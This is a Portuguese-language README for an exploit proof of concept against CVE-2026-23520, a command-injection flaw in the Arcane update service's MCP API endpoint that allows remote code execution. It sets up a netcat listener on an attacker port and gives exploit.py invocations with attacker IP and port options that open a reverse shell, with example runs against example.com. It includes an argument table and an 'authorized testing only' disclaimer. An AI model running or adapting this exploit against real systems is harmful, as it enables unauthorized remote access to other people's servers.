
Prova de conceito de exploit para CVE-2026-23520, uma vulnerabilidade de injeção de comandos no serviço de atualização do Arcane, permitindo execução remota de código por meio de requisições de API manipuladas.
Este repositório contém uma Prova de Conceito (PoC) de exploit para uma vulnerabilidade de Execução Remota de Comandos (RCE) que afeta aplicações que expõem um endpoint de API MCP vulnerável (comumente /api/mcp/connect).
A vulnerabilidade permite a execução de comandos a nível de sistema por meio de uma solicitação de API manipulada.
nc -lvnp ATTACKER_PORT
python3 exploit.py TARGET --lhost ATTACKER_IP --lport ATTACKER_PORT
python3 exploit.py <target> --lhost <ATTACKER_IP> --lport <ATTACKER_PORT> [options]
| Argumento | Descrição |
|---|---|
| target | IP, domínio ou URL do alvo |
| --lhost | IP do atacante |
| --lport | Porta do atacante |
| Flag | Descrição |
|---|---|
| -p, --port | Porta do alvo (padrão: 443) |
| -s, --scheme | http ou https (padrão: https) |
| -e, --endpoint | Caminho do endpoint da API |
| -t, --timeout | Tempo limite da solicitação |
| -v, --verbose | Saída de depuração |
python3 exploit.py example.com --lhost 10.10.10.10 --lport 4444
python3 exploit.py example.com -s http -p 80 --lhost 10.10.10.10 --lport 4444
/bin/bash esteja disponível.Apenas para testes autorizados e fins educacionais.
Parosh B